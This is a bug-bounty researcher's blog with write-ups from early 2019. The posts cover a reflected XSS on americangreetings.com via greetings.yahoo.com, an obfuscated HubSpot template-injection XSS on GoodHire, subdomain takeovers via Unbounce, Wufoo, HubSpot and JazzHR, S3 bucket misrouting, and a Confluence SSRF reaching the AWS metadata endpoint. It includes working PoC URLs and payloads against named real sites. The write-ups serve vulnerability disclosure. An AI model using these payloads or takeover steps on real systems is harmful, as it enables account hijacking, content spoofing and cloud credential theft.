Feb 26, 2019

[Still work] Redirect Yahoo Subdomain XSS Reflected from americangreetings.com






Bug Type : Reflected XSS
Affected Site : americangreetings.com 
Yahoo Subdomain : greetings.yahoo.com


Description 
I've reported this to yahoo and Greeting but was marked as infromative 
so they don't mind to disclose it.

This XSS  still work 

I've found that yahoo subdomain greetings.yahoo.com can be redirect to any path americangreetings.com 

So I tried to get a reflected XSS at americangreetings.com in paths

The XSS was affected this path 
/search-results/{xss payload}

************************************
Suggested fix to yahoo was
to make fix like 
greetings.yahoo.ca
it redirect only to site home only 

***************************************

Poc link : 

http://greetings.yahoo.com/search-results/'"--><Details Open OnToggle=confirm`Haron`>

https://www.americangreetings.com/search-results/'%22--%3e%3cDetails%20Open%20OnToggle=confirm%60Haron%60%3e


*************************************


Feb 22, 2019

AWS s3 Buckets Create





Amazon aws s3 buckets are Simple and Can be created by everyone

************************
Steps to create a S3 bucket 

1) you must create an amazon aws account first ( Required Credit Card ) 
 your payment information so we can verify your identity. They will not charge you unless your usage exceeds the AWS Free Tier Limits.


3) create Bucket is simple here as you see in pic 

2) Enter you Bucket name 
I've choose HaronBucket 
Please remember this will be your bucket link 
exmaple as mine 
haronbucket.s3.amazonaws.com
s3.amazonaws.com/haronbucket


Click Next Then Next if you don't need a special config or permissions



After clicking Create Bucket
Your Bucket will be Shown in Buckets Home


**********************************
Now Upload your files is very easy 
1) go to your buckets home
2) choose your bucket which you want to upload files 
or you can go to this link ( add your bucket )
https://s3.console.aws.amazon.com/s3/buckets/your-bucket/


3) Click on get Start and Choose your files you want to upload :) then click upload

4 ) Your upload file will be shown in your bucket home files click on the file which you upload




5) click on Make Public and scroll down you will see your file link Public


Subdomain Misconfiguration lead to AWS S3 Buckets Reader




Bug Type : Subdomain misconfiguration
Program : Private on HackerOne
Severity : P2 ( High
Bounty : 600$ + 200$ Bouns
Subdomain : images.example.com

************************************
How I found this Bug 
it was simple When I go direct to https://images.example.com I found it redirect to https://aws.amazon.com/s3/

So now I started to found the cname and it was
images.example.com  >  s3.amazon.com

Here was the bug I saw many companies use the same error 
Developers must add a white s3 Buckets list 

So now I can call any bucket on images.example.com

example : images.example.com/haron-bucket/




************************
Steps to find This error very simple
 if the subdomain has this alias s3.amazonaws.com 
Try to add your bucket directly to subdomain 
example : subdomain.site.com/yourbucket/yourfile.html
if it run this is vulnerable if not so this mean developers added a white buckets list

******************************************


Please see this Write Up for create your Bucket 
https://www.mohamedharon.com/2019/02/aws-s3-buckets-create.html




*********************************************************


Feb 18, 2019

2 Subdomains Takeover via Unbounce in a Private Program









Many Researchers asked me about this takeover is still exist or fixed ? 
Yes this takeover still exist with 3 scenarios 
as Akita Zen said 


*****************************
Bug Type : Subdomain Takeover 
Service : Unbounce 
Severity : Critical 
Program : Private on Hackerone
Status : Duplicate after fixing it

*************************
In a Private Program on HackerOne I've found a 2 subdomains
get.example.com
try.example.com
 has an cname  pointing to unbouncepages.com
and show me the takeover error ( Finger print ) 
So I made an account and tried to add the domain to my page on unbounce and it connected Successful 


Steps to takeover 
1) create an account on unbounce with credit card  
2) create your unbounce page 
3) add a domain to your page 
if give you the domain is already taken this mean there is no takeover.
example : info.hacker.one
its show us the takeover finger print but its already worked and added to another account so there is no takeover in it.




Timeline 
Reported : 6 Nov,2018
Traiged : 7 Nov,2018
I notice that they Fixed it : 7 Nov,2018 after 2 hours 
Duplicate : 10 Nov,2018


******************************

Feb 17, 2019

Reflected XSS in GoodHire.com CMS

Reflected XSS in GoodHire.com CMS






Program : inflection
Bug Type : Reflected XSS
Severity : High 
Domain : GoodHire.com
Bounty : 0$ + Bouns 150$

******************************
Affected Parameter was in HubSpot CMS
referrerUrl
Affected Path 
/_hcms/cta

**********************************
Payload
{%25+macro+field()+%25}moc.okok//:ptth//)niamod.tnemucod(trela:tpircsavaj=daolno+gvshttp://http:""//{%25+endmacro+%25}{{+field(1)%7curlize%7creverse%7curlize%7creverse%7curlize%7creverse+}}


**********************************
Poc was : 
https://www.goodhire.com/_hcms/cta?referrerUrl={%25+macro+field()+%25}moc.okok//:ptth//)niamod.tnemucod(trela:tpircsavaj=daolno+gvshttp://http:%22%22//{%25+endmacro+%25}{{+field(1)%7curlize%7creverse%7curlize%7creverse%7curlize%7creverse+}}


***********************************
More about this Bug please visit my write up 






****************************************

Feb 16, 2019

Subdomain Takeover via Wufoo Service in a Private Program







Program : Private Program On Hackerone
Bug Type : Subdomain Takeover
Service : WUFOO
Severity :  Medium (cause it redirect)
Reward : 500$
Subdomain : Bug.example.com

*********************************
Wufoo 
Wufoo's HTML form builder helps you create online web forms. Use our web form creator to power your contact forms, online surveys, and event registrations.

*************************************
Steps and how I found this Bug 

When I go directly to the Subdomain 
It redirect me to another subdomain and Show me this error


First I notice that Profile Not found 
So I searched About Wufoo and See what it do

1) When you create a free profile on Wufoo 
they give you a Subdomain for your profile

yourprofile.wufoo.com

2) You can change it later so I changed it to subdomian cname which was not found

3) Created a Form to provide more Poc 


4 ) Seems this Poc is enough if you wanna add a page or JavaScript Codes
 you will upgrade your free account 




**********************************

Feb 15, 2019

Subdomain Takeover via HubSpot






Last Year I was able to Subdomain takeover in A public Program via HubSpot Service and After that the Program closed my report as informative by a HackerOne Staff. 

Some Researchers says " You can't takeover subdomains via HubSpot any more " after the report of Frans Rosen https://hackerone.com/reports/38007 it was  4 years ago and Seems that Hubspot fixed Their DNS services.

In This Blog I want only to say and Provide that 
HubSpot is still vulnerable to subdomain takeovers

In my Report I was able to ByPass the DNS Confirmation and made the subdomain connect direct to my new DNS 

Subdomain Takeover via HubSpot Finger Print 

 POC





*************************************

Souq.com Subdomain Takeover via jazzhr.com service





Program :  Souq

Vulnerability : Subdomain Takeover 

Impact  : High


`jobs.souq.com` was vulnerable to subdomain takeover via `jazzhr.com` Service

When I visit jobs.souq.com it was shown me an error ( finger print )


So I started to see the cname 
 `Jobs.souq.com` was has a cname `souq.applytojob.com`

So I go directly to the service provider and they was allowed me to take the cname `souq.applytojob.com



`jobs.souq.com` not allowed me to connect it directly seems there was a Bug ! 

 After 1 day I notice that subdomain has been connected to the cname in some paths example : `/app/share/`



Funny thing there is someone apply to fake Security Job ! 😀

Time line 
2019-02-04: Bug reported
2019-01-05: Fixed with no comments 
2019-01-06: Closed as Informative ! 




Feb 14, 2019

[SSRF] Server Side Request Forgery in a private Program developers.example.com







*****************************************

Program : Private program ( HackerOne ) 
Subdomain : Developers.Example.com 
Bounty : 200$
Severity : Critical
Issue Type : SSRF  

****************************************

I've found SSRF vulnerability in a Private Program on HackerOne

The affected subdomain ( developers ) was used 
vulnerable confluence instance  version <= 6.00

POC example :

developers.example.com/plugins/servlet/oauth/users/icon-uri?consumerUri=http://google.com

****************************

 any AWS instance can query an ip and receive information related to that instance and even account information. I then checked the local host name through the AWS meta-data end point, by visiting 
http://169.254.169.254/latest/meta-data/local-hostname/


developers.example.com/plugins/servlet/oauth/users/icon-uri?consumerUri=http://169.254.169.254/latest/meta-data/